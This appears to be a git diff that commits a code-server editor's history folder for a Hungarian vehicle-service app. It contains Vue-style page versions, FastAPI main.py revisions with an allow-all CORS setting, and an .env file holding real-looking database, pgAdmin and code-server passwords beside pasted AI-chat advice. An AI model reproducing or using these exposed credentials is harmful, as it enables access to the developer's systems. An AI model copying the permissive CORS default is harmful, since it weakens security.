+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/eVfD.html b/code-server-config/data/User/History/-52e5c41d/eVfD.html new file mode 100755 index 0000000..ff2b3c3 --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/eVfD.html @@ -0,0 +1,195 @@ + + + + + + Service Finder + + + + + + +
+ + +
+
+ +
+
+
+
+
+
{{ car.brand }}
{{ car.model }}
+ + +
+
{{ car.plate }}
{{ (car.status !== 'OK' && car.status !== null) ? 'HIBA' : car.role }}
+
+
+
+
+ +
+ +
+
+
+ +
+

{{ selectedCar.brand }} {{ selectedCar.model }}

{{ selectedCar.plate }}ÁLLAPOT: {{ selectedCar.status }}
+
+
+
+ +
+
+
+
{{ selectedCar.mileage.toLocaleString() }}
Km
+
{{ (selectedCar.status !== 'OK' && selectedCar.status !== null) ? 'HIBA' : 'OK' }}
Állapot
+
{{ formatMoney(selectedCar.year_cost, selectedCar.currency) }}
Idei költés
+
+
Hiba:

{{ selectedCar.current_issue }}

Nincs hiba
+
+
+
+
+
Még üres a szervizkönyv.
+
+
+
+
+
+
{{ translateType(item.type) }}+{{ formatMoney(item.amount, item.currency) }}
+

{{ item.description }}

+
{{ item.mileage.toLocaleString() }} kmCsatolmány
+
+
{{ item.date }}
+
+
+
+
+
+
+ + + + +
+
+ + + + + diff --git a/code-server-config/data/User/History/-52e5c41d/eiJs.html b/code-server-config/data/User/History/-52e5c41d/eiJs.html new file mode 100755 index 0000000..12f248e --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/eiJs.html @@ -0,0 +1,157 @@ + + + + + + Service Finder + + + + + + +
+ + +
+ +
+ + +
+
+
+
+
+
{{ car.brand }}
{{ car.model }}
+ + +
+
+
{{ car.plate }}
+ + {{ (car.status !== 'OK' && car.status !== null) ? 'HIBA' : car.role }} + +
+
+
+
+

Csapat...

+
+ +
+ + +
+
+
+ +
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+
+ {{ selectedCar.plate }} + ÁLLAPOT: {{ selectedCar.status }} +
+
+
+ +
+ +
+
+
{{ selectedCar.mileage }}
Km
+
+
+
+
Jelentett hiba:
+

{{ selectedCar.current_issue }}

+
+
Minden rendben.
+
+
+
+ + + +
+
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/entries.json b/code-server-config/data/User/History/-52e5c41d/entries.json new file mode 100755 index 0000000..db09972 --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/frontend/index.html","entries":[{"id":"Rpxl.html","timestamp":1768942812487},{"id":"uiHD.html","timestamp":1768944736458},{"id":"W3D5.html","timestamp":1768945170064},{"id":"Smd7.html","timestamp":1768945219838},{"id":"JA3R.html","timestamp":1768945489618},{"id":"eiJs.html","timestamp":1768945771369},{"id":"J4V4.html","timestamp":1768946012393},{"id":"u9Y2.html","timestamp":1768946248437},{"id":"voAw.html","timestamp":1768946585191},{"id":"Ycqg.html","timestamp":1768946927538},{"id":"9eYi.html","timestamp":1768947157813},{"id":"0xVC.html","timestamp":1768948398804},{"id":"eVfD.html","timestamp":1768948761622},{"id":"SxEq.html","timestamp":1768952718461},{"id":"83UF.html","timestamp":1768953098851},{"id":"eRba.html","source":"undoRedo.source","timestamp":1768953103288},{"id":"SVyy.html","timestamp":1768953182984},{"id":"x8lC.html","timestamp":1768953329888},{"id":"UAc0.html","timestamp":1768954114635},{"id":"UE2n.html","timestamp":1768954243537},{"id":"tEyM.html","timestamp":1768954546782},{"id":"iTl3.html","timestamp":1768954770366},{"id":"E3XE.html","timestamp":1768954920487}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/iTl3.html b/code-server-config/data/User/History/-52e5c41d/iTl3.html new file mode 100755 index 0000000..3b89684 --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/iTl3.html @@ -0,0 +1,207 @@ + + + + + Service Finder - Full Control + + + + + +
+ + +
+
+

Service Finder

+ + + +
+
+ +
+
+
+

Járműveim

+ +
+ +
+
+
+
+
+
{{car.brand}}
+
{{car.model}}
+
+ {{car.plate}} +
+
+
{{formatMoney(car.total_cost)}}
+
+ + +
+
+
+
+
+
+ +
+ +
+
+

{{selectedCar.brand}} {{selectedCar.model}}

+ +
+
+
+
Állapot

Rendben

+
Hibaüzenetek

Nincs

+
Következő szerviz

15,000 km múlva

+
+
+
+
+ + + + +
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/tEyM.html b/code-server-config/data/User/History/-52e5c41d/tEyM.html new file mode 100755 index 0000000..419d382 --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/tEyM.html @@ -0,0 +1,122 @@ + + + + + Service Finder - Dinamikus + + + + + +
+
+
+

Service Finder

+ + + +
+
+ +
+
+

Garázsom

+ +
+ +
+
+
+
{{car.brand}}
+
{{car.model}}
+ {{car.plate}} +
+
+
+
+ + +
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/u9Y2.html b/code-server-config/data/User/History/-52e5c41d/u9Y2.html new file mode 100755 index 0000000..46688fc --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/u9Y2.html @@ -0,0 +1,296 @@ + + + + + + Service Finder + + + + + + +
+ + +
+ +
+ +
+
+
+
+
+
{{ car.brand }}
{{ car.model }}
+ + +
+
+
{{ car.plate }}
+ + {{ (car.status !== 'OK' && car.status !== null) ? 'HIBA' : car.role }} + +
+
+
+
+
+ +
+ + +
+
+
+ +
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+
+ {{ selectedCar.plate }} + ÁLLAPOT: {{ selectedCar.status }} +
+
+
+
+ + +
+
+ + + +
+
+
+
{{ selectedCar.mileage.toLocaleString() }}
Km
+
+
+
{{ (selectedCar.status !== 'OK' && selectedCar.status !== null) ? 'HIBA' : 'OK' }}
Állapot
+
+
+
+
+
+
Hiba:

{{ selectedCar.current_issue }}

+ +
+
+
Nincs nyitott hiba.
+
+
+
+ +
+
+ + Még üres a szervizkönyv. Rögzíts tankolást vagy eseményt! +
+
+
+
+
+
+
+ {{ translateType(item.type) }} + +{{ formatMoney(item.amount, item.currency) }} +
+

{{ item.description }}

+ {{ item.mileage.toLocaleString() }} km +
+
+ {{ item.date }} +
+
+
+
+
+
+
+ + + + + +
+
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/uiHD.html b/code-server-config/data/User/History/-52e5c41d/uiHD.html new file mode 100755 index 0000000..c969375 --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/uiHD.html @@ -0,0 +1,233 @@ + + + + + + Service Finder + + + + + + +
+ + +
+ + + +
+
+

Járművek

+ +
+
+
+
+
+
+
{{ car.brand }}
{{ car.model }}
+ +
+
+
{{ car.plate }}
+ {{ translateRole(car.role) }} +
+
+
+
+
+ +
+
+

Munkatársak

+ +
+ +
+
+ + + + + + + + + + + + + + + + + + + +
Név / EmailSzerepkörOrszágCsatlakozottMűveletek
+
+
{{ member.email.charAt(0).toUpperCase() }}
+
+
Munkatárs
+
{{ member.email }}
+
+
+
{{ translateRole(member.role) }}{{ member.country }}{{ member.joined_at ? member.joined_at.split('T')[0] : 'Ma' }} + +
+
+
+ + Még nincs senki a csapatban. Hívj meg valakit! +
+
+
+ + + +
+

Varázsló helye...

+ +
+ +
+
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/voAw.html b/code-server-config/data/User/History/-52e5c41d/voAw.html new file mode 100755 index 0000000..3ec50de --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/voAw.html @@ -0,0 +1,206 @@ + + + + + + Service Finder + + + + + + +
+ + +
+ +
+ +
+
+
+
+
+
{{ car.brand }}
{{ car.model }}
+ + +
+
+
{{ car.plate }}
+ + {{ (car.status !== 'OK' && car.status !== null) ? 'HIBA' : car.role }} + +
+
+
+
+
+ +
+ + +
+
+
+ +
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+
+ {{ selectedCar.plate }} + ÁLLAPOT: {{ selectedCar.status }} +
+
+
+
+ + +
+
+ + + +
+
+
+
+
{{ selectedCar.mileage.toLocaleString() }}
Km
+
+
+
+
{{ (selectedCar.status !== 'OK' && selectedCar.status !== null) ? 'HIBA' : 'OK' }}
+
Műszaki állapot
+
+
+
+
+
{{ formatMoney(selectedCar.year_cost, selectedCar.currency) }}
+
Idei költés
+
+
+
+
+
Hiba:
+

{{ selectedCar.current_issue }}

+ +
+
+
+
Nincs hiba
+
+
+
+
+ +
+
Még üres a szervizkönyv.
+
+
+
+
+
+
+ {{ translateType(item.type) }} + +{{ formatMoney(item.amount, item.currency) }} +
+

{{ item.description }}

+ {{ item.mileage.toLocaleString() }} km +
+
{{ item.date }}
+
+
+
+
+
+
+ + + + +
+
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/x8lC.html b/code-server-config/data/User/History/-52e5c41d/x8lC.html new file mode 100755 index 0000000..8d99b7e --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/x8lC.html @@ -0,0 +1,256 @@ + + + + + + Service Finder - Flotta Kezelő + + + + + + +
+
+
+

Service Finder

+ +
+
+ + +
+
+ + +
+ +

Nincs fiókod? Regisztrálj!

+
+ +
+
+ + +
+
+ + +
+ +

Vissza a belépéshez

+
+
+
+ +
+ + +
+
+
+

Saját Járművek

+ +
+
+
+
+
+
{{ car.brand }}
+
{{ car.model }}
+
+ {{ car.plate }} + +
+
+
+
+
+ + A garázsod még üres. +
+
+ +
+ +
+
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+ {{ selectedCar.plate }} +
+
+ +
+
+
+
+
Km állás
{{ selectedCar.mileage }}
+
Idei költség
{{ formatMoney(selectedCar.year_cost, selectedCar.currency) }}
+
Állapot
{{ selectedCar.status }}
+
+
+
+
+ + +
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-5314da0c/54N2.py b/code-server-config/data/User/History/-5314da0c/54N2.py new file mode 100755 index 0000000..f244e2f --- /dev/null +++ b/code-server-config/data/User/History/-5314da0c/54N2.py @@ -0,0 +1,65 @@ +from contextlib import asynccontextmanager +from fastapi import FastAPI +from fastapi.middleware.cors import CORSMiddleware + +# 1. Konfiguráció importálása +from app.core.config import settings + +# 2. Adatbázis importok (JAVÍTVA) +# A 'Base' tartalmazza a modellek definícióit (app/db/base.py) +from app.db.base import Base +# Az 'engine' kezeli a kapcsolatot (app/db/session.py) +from app.db.session import engine + +# 3. Router importálása +from app.api.v1.router import api_router + +# --- Lifespan (Életciklus) Kezelő --- +# Ez fut le az alkalmazás indulásakor és leállásakor +@asynccontextmanager +async def lifespan(app: FastAPI): + # INDÍTÁS (Startup): Táblák létrehozása fejlesztői módban + async with engine.begin() as conn: + # Fontos: Importálnunk kell a modelleket, hogy a Base tudjon róluk, + # mielőtt létrehozzuk a táblákat! + # Ha vannak új modelljeid (pl. logistics, user), írd hozzá őket ide: + from app.models import social, vehicle, user, logistics + + print("--- Adatbázis táblák ellenőrzése és létrehozása ---") + await conn.run_sync(Base.metadata.create_all) + + yield # Itt fut az alkalmazás... + + # LEÁLLÁS (Shutdown): Erőforrások elengedése + print("--- Traffic Ecosystem SuperApp leállítása ---") + await engine.dispose() + +# --- Alkalmazás Inicializálása --- +app = FastAPI( + title=settings.PROJECT_NAME, + version=settings.VERSION, + openapi_url=f"{settings.API_V1_STR}/openapi.json", + lifespan=lifespan +) + +# --- Middleware (CORS) --- +# Engedélyezzük, hogy a frontend kommunikálhasson az API-val +app.add_middleware( + CORSMiddleware, + allow_origins=["*"], # FIGYELEM: Élesben ezt szigorítani kell (pl. a frontend domainjére)! + allow_credentials=True, + allow_methods=["*"], + allow_headers=["*"], +) + +# --- Routerek csatolása --- +app.include_router(api_router, prefix=settings.API_V1_STR) + +# --- Gyökér végpont --- +@app.get("/") +async def root(): + return { + "message": "Traffic Ecosystem SuperApp API fut", + "version": settings.VERSION, + "docs_url": "/docs" # Segítség a fejlesztőknek + } \ No newline at end of file diff --git a/code-server-config/data/User/History/-5314da0c/9MWC.py b/code-server-config/data/User/History/-5314da0c/9MWC.py new file mode 100755 index 0000000..5f59508 --- /dev/null +++ b/code-server-config/data/User/History/-5314da0c/9MWC.py @@ -0,0 +1,65 @@ +from contextlib import asynccontextmanager +from fastapi import FastAPI +from fastapi.middleware.cors import CORSMiddleware + +# 1. Konfiguráció importálása +from app.core.config import settings + +# 2. Adatbázis importok (JAVÍTVA) +# A 'Base' tartalmazza a modellek definícióit (app/db/base.py) +from app.db.base import Base +# Az 'engine' kezeli a kapcsolatot (app/db/session.py) +from app.db.session import engine + +# 3. Router importálása +from app.api.v1.router import api_router + +# --- Lifespan (Életciklus) Kezelő --- +# Ez fut le az alkalmazás indulásakor és leállásakor +@asynccontextmanager +async def lifespan(app: FastAPI): + # INDÍTÁS (Startup): Táblák létrehozása fejlesztői módban + async with engine.begin() as conn: + # Fontos: Importálnunk kell a modelleket, hogy a Base tudjon róluk, + # mielőtt létrehozzuk a táblákat! + # Ha vannak új modelljeid (pl. logistics, user), írd hozzá őket ide: + from app.models import social, vehicle, user + + print("--- Adatbázis táblák ellenőrzése és létrehozása ---") + await conn.run_sync(Base.metadata.create_all) + + yield # Itt fut az alkalmazás... + + # LEÁLLÁS (Shutdown): Erőforrások elengedése + print("--- Traffic Ecosystem SuperApp leállítása ---") + await engine.dispose() + +# --- Alkalmazás Inicializálása --- +app = FastAPI( + title=settings.PROJECT_NAME, + version=settings.VERSION, + openapi_url=f"{settings.API_V1_STR}/openapi.json", + lifespan=lifespan +) + +# --- Middleware (CORS) --- +# Engedélyezzük, hogy a frontend kommunikálhasson az API-val +app.add_middleware( + CORSMiddleware, + allow_origins=["*"], # FIGYELEM: Élesben ezt szigorítani kell (pl. a frontend domainjére)! + allow_credentials=True, + allow_methods=["*"], + allow_headers=["*"], +) + +# --- Routerek csatolása --- +app.include_router(api_router, prefix=settings.API_V1_STR) + +# --- Gyökér végpont --- +@app.get("/") +async def root(): + return { + "message": "Traffic Ecosystem SuperApp API fut", + "version": settings.VERSION, + "docs_url": "/docs" # Segítség a fejlesztőknek + } \ No newline at end of file diff --git a/code-server-config/data/User/History/-5314da0c/FkfR.py b/code-server-config/data/User/History/-5314da0c/FkfR.py new file mode 100755 index 0000000..0a47d0a --- /dev/null +++ b/code-server-config/data/User/History/-5314da0c/FkfR.py @@ -0,0 +1,54 @@ +from contextlib import asynccontextmanager +from fastapi import FastAPI +from fastapi.middleware.cors import CORSMiddleware + +from app.core.config import settings +from app.core.database import engine, Base +from app.api.v1.router import api_router + +# --- Lifespan Manager (Startup & Shutdown Logic) --- +@asynccontextmanager +async def lifespan(app: FastAPI): + # STARTUP: Adatbázis táblák létrehozása + # Figyelem: Éles környezetben (Production) inkább Alembic migrációt használunk! + async with engine.begin() as conn: + # Betöltjük a modelleket, hogy a metadata tudjon róluk + # Fontos: importálni kell őket, különben nem jönnek létre! + from app.models import social, vehicle, user, logistics + await conn.run_sync(Base.metadata.create_all) + + print("--- Database Tables Checked/Created ---") + + yield # Itt fut az alkalmazás... + + # SHUTDOWN: Erőforrások felszabadítása (ha lenne) + print("--- Shutting down ---") + +# --- App Initialization --- +app = FastAPI( + title=settings.PROJECT_NAME, + version=settings.VERSION, + openapi_url=f"{settings.API_V1_STR}/openapi.json", + lifespan=lifespan +) + +# --- Middleware (CORS) --- +# Engedélyezzük a frontend kommunikációt +app.add_middleware( + CORSMiddleware, + allow_origins=["*"], # Élesben szigorítani kell! + allow_credentials=True, + allow_methods=["*"], + allow_headers=["*"], +) + +# --- Routers --- +app.include_router(api_router, prefix=settings.API_V1_STR) + +@app.get("/") +async def root(): + return { + "message": "Traffic Ecosystem SuperApp API is Running", + "docs_url": "/docs", + "version": settings.VERSION + } \ No newline at end of file diff --git a/code-server-config/data/User/History/-5314da0c/Fp0w.py b/code-server-config/data/User/History/-5314da0c/Fp0w.py new file mode 100755 index 0000000..0e59f48 --- /dev/null +++ b/code-server-config/data/User/History/-5314da0c/Fp0w.py @@ -0,0 +1,68 @@ +from contextlib import asynccontextmanager +from fastapi import FastAPI +from fastapi.middleware.cors import CORSMiddleware + +# 1. Config Import +from app.core.config import settings + +# 2. Database Imports (FIXED PATHS) +# 'Base' contains the model definitions (from app/db/base.py) +from app.db.base import Base +# 'engine' handles the connection (assumed to be in app/db/session.py) +from app.db.session import engine + +# 3. Router Import +from app.api.v1.router import api_router + +# --- Lifespan Manager (Startup & Shutdown Logic) --- +@asynccontextmanager +async def lifespan(app: FastAPI): + """ + Handles application startup and shutdown events. + """ + # STARTUP: Create Database Tables (Development Mode) + # In production, you should use Alembic migrations instead of this. + async with engine.begin() as conn: + # We must import models here so that Base.metadata knows about them + # before we call create_all. + # Ensure these files exist in app/models/ + from app.models import social, vehicle # Add 'user', 'logistics' if created + + print("--- Checking/Creating Database Tables ---") + await conn.run_sync(Base.metadata.create_all) + + yield # The application runs here + + # SHUTDOWN: Cleanup resources + print("--- Shutting down Traffic Ecosystem SuperApp ---") + await engine.dispose() + +# --- App Initialization --- +app = FastAPI( + title=settings.PROJECT_NAME, + version=settings.VERSION, + openapi_url=f"{settings.API_V1_STR}/openapi.json", + lifespan=lifespan +) + +# --- Middleware (CORS) --- +# Allows the frontend to communicate with this API +app.add_middleware( + CORSMiddleware, + allow_origins=["*"], # WARNING: Restrict this in production! + allow_credentials=True, + allow_methods=["*"], + allow_headers=["*"], +) + +# --- Routers --- +app.include_router(api_router, prefix=settings.API_V1_STR) + +# --- Root Endpoint --- +@app.get("/") +async def root(): + return { + "message": "Traffic Ecosystem SuperApp API is Running", + "version": settings.VERSION, + "docs_url": "/docs" + } \ No newline at end of file diff --git a/code-server-config/data/User/History/-5314da0c/MlfW.py b/code-server-config/data/User/History/-5314da0c/MlfW.py new file mode 100755 index 0000000..1689920 --- /dev/null +++ b/code-server-config/data/User/History/-5314da0c/MlfW.py @@ -0,0 +1,100 @@ +from contextlib import asynccontextmanager +from fastapi import FastAPI +from fastapi.middleware.cors import CORSMiddleware +from fastapi.openapi.utils import get_openapi + +# 1. Konfiguráció importálása +from app.core.config import settings + +# 2. Adatbázis importok +from app.db.base import Base +from app.db.session import engine + +# 3. Router importálása +from app.api.v1.router import api_router + +# --- Lifespan (Életciklus) Kezelő --- +@asynccontextmanager +async def lifespan(app: FastAPI): + # INDÍTÁS (Startup): Táblák létrehozása fejlesztői módban + async with engine.begin() as conn: + # Importáljuk a modelleket, hogy a Base tudjon róluk! + from app.models import social, vehicle, user, logistics, expense + + print("--- Adatbázis táblák ellenőrzése és létrehozása ---") + await conn.run_sync(Base.metadata.create_all) + + yield # Itt fut az alkalmazás... + + # LEÁLLÁS (Shutdown): Erőforrások elengedése + print("--- Traffic Ecosystem SuperApp leállítása ---") + await engine.dispose() + +# --- Alkalmazás Inicializálása --- +app = FastAPI( + title=settings.PROJECT_NAME, + version=settings.VERSION, + openapi_url=f"{settings.API_V1_STR}/openapi.json", + lifespan=lifespan, + # Ez a beállítás segít, hogy a lakat megmaradjon frissítés után is + swagger_ui_parameters={"persistAuthorization": True} +) + +# --- OpenAPI Biztonsági Séma (Hogy legyen Authorize gomb!) --- +def custom_openapi(): + if app.openapi_schema: + return app.openapi_schema + + openapi_schema = get_openapi( + title=app.title, + version=app.version, + description="API dokumentáció JWT hitelesítéssel", + routes=app.routes, + ) + + # Itt definiáljuk a lakatot és a JWT formátumot + openapi_schema["components"]["securitySchemes"] = { + "OAuth2PasswordBearer": { + "type": "oauth2", + "flows": { + "password": { + "tokenUrl": "/api/v1/auth/login" + } + } + } + } + + # Globálisan alkalmazzuk minden védett végpontra + for path in openapi_schema["paths"]: + for method in openapi_schema["paths"][path]: + # Csak azokra a kérésekre rakunk lakatot, amik nincsenek a kivételek között + # (Az auth/login és auth/register maradjon nyitva) + if not any(x in path for x in ["/auth/login", "/auth/register"]): + openapi_schema["paths"][path][method]["security"] = [{"OAuth2PasswordBearer": []}] + + app.openapi_schema = openapi_schema + return app.openapi_schema + +# Felülírjuk az alapértelmezett OpenAPI generátort a sajátunkkal +app.openapi = custom_openapi + +# --- Middleware (CORS) --- +app.add_middleware( + CORSMiddleware, + allow_origins=["*"], + allow_credentials=True, + allow_methods=["*"], + allow_headers=["*"], +) + +# --- Routerek csatolása --- +app.include_router(api_router, prefix=settings.API_V1_STR) + +# --- Gyökér végpont --- +@app.get("/") +async def root(): + return { + "message": "Traffic Ecosystem SuperApp API fut", + "version": settings.VERSION, + "docs_url": "/docs" + } \ No newline at end of file diff --git a/code-server-config/data/User/History/-5314da0c/eSN2.py b/code-server-config/data/User/History/-5314da0c/eSN2.py new file mode 100755 index 0000000..08b1366 --- /dev/null +++ b/code-server-config/data/User/History/-5314da0c/eSN2.py @@ -0,0 +1,100 @@ +from contextlib import asynccontextmanager +from fastapi import FastAPI +from fastapi.middleware.cors import CORSMiddleware +from fastapi.openapi.utils import get_openapi + +# 1. Konfiguráció importálása +from app.core.config import settings + +# 2. Adatbázis importok +from app.db.base import Base +from app.db.session import engine + +# 3. Router importálása +from app.api.v1.router import api_router + +# --- Lifespan (Életciklus) Kezelő --- +@asynccontextmanager +async def lifespan(app: FastAPI): + # INDÍTÁS (Startup): Táblák létrehozása fejlesztői módban + async with engine.begin() as conn: + # Importáljuk a modelleket, hogy a Base tudjon róluk! + from app.models import social, vehicle, user, logistics, expense + + print("--- Adatbázis táblák ellenőrzése és létrehozása ---") + await conn.run_sync(Base.metadata.create_all) + + yield # Itt fut az alkalmazás... + + # LEÁLLÁS (Shutdown): Erőforrások elengedése + print("--- Traffic Ecosystem SuperApp leállítása ---") + await engine.dispose() + +# --- Alkalmazás Inicializálása --- +app = FastAPI( + title=settings.PROJECT_NAME, + version=settings.VERSION, + openapi_url=f"{settings.API_V1_STR}/openapi.json", + lifespan=lifespan, + # Ez a beállítás segít, hogy a lakat megmaradjon frissítés után is + swagger_ui_parameters={"persistAuthorization": True} +) + +# --- OpenAPI Biztonsági Séma (Hogy legyen Authorize gomb!) --- +def custom_openapi(): + if app.openapi_schema: + return app.openapi_schema + + openapi_schema = get_openapi( + title=app.title, + version=app.version, + description="API dokumentáció JWT hitelesítéssel", + routes=app.routes, + ) + + # Itt definiáljuk a lakatot és a JWT formátumot + openapi_schema["components"]["securitySchemes"] = { + "OAuth2PasswordBearer": { + "type": "oauth2", + "flows": { + "password": { + "tokenUrl": f"{settings.API_V1_STR}/auth/login" + } + } + } + } + + # Globálisan alkalmazzuk minden védett végpontra + for path in openapi_schema["paths"]: + for method in openapi_schema["paths"][path]: + # Csak azokra a kérésekre rakunk lakatot, amik nincsenek a kivételek között + # (Az auth/login és auth/register maradjon nyitva) + if not any(x in path for x in ["/auth/login", "/auth/register"]): + openapi_schema["paths"][path][method]["security"] = [{"OAuth2PasswordBearer": []}] + + app.openapi_schema = openapi_schema + return app.openapi_schema + +# Felülírjuk az alapértelmezett OpenAPI generátort a sajátunkkal +app.openapi = custom_openapi + +# --- Middleware (CORS) --- +app.add_middleware( + CORSMiddleware, + allow_origins=["*"], + allow_credentials=True, + allow_methods=["*"], + allow_headers=["*"], +) + +# --- Routerek csatolása --- +app.include_router(api_router, prefix=settings.API_V1_STR) + +# --- Gyökér végpont --- +@app.get("/") +async def root(): + return { + "message": "Traffic Ecosystem SuperApp API fut", + "version": settings.VERSION, + "docs_url": "/docs" + } \ No newline at end of file diff --git a/code-server-config/data/User/History/-5314da0c/entries.json b/code-server-config/data/User/History/-5314da0c/entries.json new file mode 100755 index 0000000..1f8af88 --- /dev/null +++ b/code-server-config/data/User/History/-5314da0c/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/main.py","entries":[{"id":"FkfR.py","timestamp":1769026236612},{"id":"Fp0w.py","timestamp":1769027988167},{"id":"jmij.py","timestamp":1769028127118},{"id":"9MWC.py","timestamp":1769031896319},{"id":"54N2.py","timestamp":1769032666605},{"id":"eSN2.py","timestamp":1769043761338},{"id":"MlfW.py","timestamp":1769106292762}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/-5314da0c/jmij.py b/code-server-config/data/User/History/-5314da0c/jmij.py new file mode 100755 index 0000000..ed973b7 --- /dev/null +++ b/code-server-config/data/User/History/-5314da0c/jmij.py @@ -0,0 +1,65 @@ +from contextlib import asynccontextmanager +from fastapi import FastAPI +from fastapi.middleware.cors import CORSMiddleware + +# 1. Konfiguráció importálása +from app.core.config import settings + +# 2. Adatbázis importok (JAVÍTVA) +# A 'Base' tartalmazza a modellek definícióit (app/db/base.py) +from app.db.base import Base +# Az 'engine' kezeli a kapcsolatot (app/db/session.py) +from app.db.session import engine + +# 3. Router importálása +from app.api.v1.router import api_router + +# --- Lifespan (Életciklus) Kezelő --- +# Ez fut le az alkalmazás indulásakor és leállásakor +@asynccontextmanager +async def lifespan(app: FastAPI): + # INDÍTÁS (Startup): Táblák létrehozása fejlesztői módban + async with engine.begin() as conn: + # Fontos: Importálnunk kell a modelleket, hogy a Base tudjon róluk, + # mielőtt létrehozzuk a táblákat! + # Ha vannak új modelljeid (pl. logistics, user), írd hozzá őket ide: + from app.models import social, vehicle + + print("--- Adatbázis táblák ellenőrzése és létrehozása ---") + await conn.run_sync(Base.metadata.create_all) + + yield # Itt fut az alkalmazás... + + # LEÁLLÁS (Shutdown): Erőforrások elengedése + print("--- Traffic Ecosystem SuperApp leállítása ---") + await engine.dispose() + +# --- Alkalmazás Inicializálása --- +app = FastAPI( + title=settings.PROJECT_NAME, + version=settings.VERSION, + openapi_url=f"{settings.API_V1_STR}/openapi.json", + lifespan=lifespan +) + +# --- Middleware (CORS) --- +# Engedélyezzük, hogy a frontend kommunikálhasson az API-val +app.add_middleware( + CORSMiddleware, + allow_origins=["*"], # FIGYELEM: Élesben ezt szigorítani kell (pl. a frontend domainjére)! + allow_credentials=True, + allow_methods=["*"], + allow_headers=["*"], +) + +# --- Routerek csatolása --- +app.include_router(api_router, prefix=settings.API_V1_STR) + +# --- Gyökér végpont --- +@app.get("/") +async def root(): + return { + "message": "Traffic Ecosystem SuperApp API fut", + "version": settings.VERSION, + "docs_url": "/docs" # Segítség a fejlesztőknek + } \ No newline at end of file diff --git a/code-server-config/data/User/History/-5bd368a0/0NIq b/code-server-config/data/User/History/-5bd368a0/0NIq new file mode 100755 index 0000000..88dae7b --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/0NIq @@ -0,0 +1,74 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_port=5432 + +# --- ADATBÁZIS ELÉRÉS (A Python kódnak) --- +# Formátum: postgresql+asyncpg://FELHASZNÁLÓ:JELSZÓ@KONTÉNER_NÉV:PORT/ADATBÁZIS_NÉV +# DATABASE_URL=postgresql+asyncpg://kincses:MiskociA74@postgres-db:5432/service_finder +DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} + + + PM senior +Egyéni gem + +Ez egy kiváló észrevétel. Nagyon jól teszed, hogy ezeket a kritikus kulcsokat (SECRET_KEY, ALGORITHM) is beemeled a biztonságos környezetbe. Ezek felelnek ugyanis azért, hogy a felhasználóid bejelentkezve maradjanak, és a jelszavak biztonságban legyenek. + +Összeraktam neked a TELJES, VÉGLEGES .env fájlt, ami egyesíti a te meglévő beállításaidat az általam javasolt újakkal. +1. A Master .env fájl (Ezt hozd létre) + +Ebben a fájlban definiáljuk az "igazságot". A Docker Compose innen fogja kiolvasni az értékeket. + +Másold be ezt a fájlt a projekt gyökérkönyvtárába (.env néven): +Properties + +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=PASSWORD111 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=szuper_titkos_random_string_amit_senki_nem_tud +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/27fC 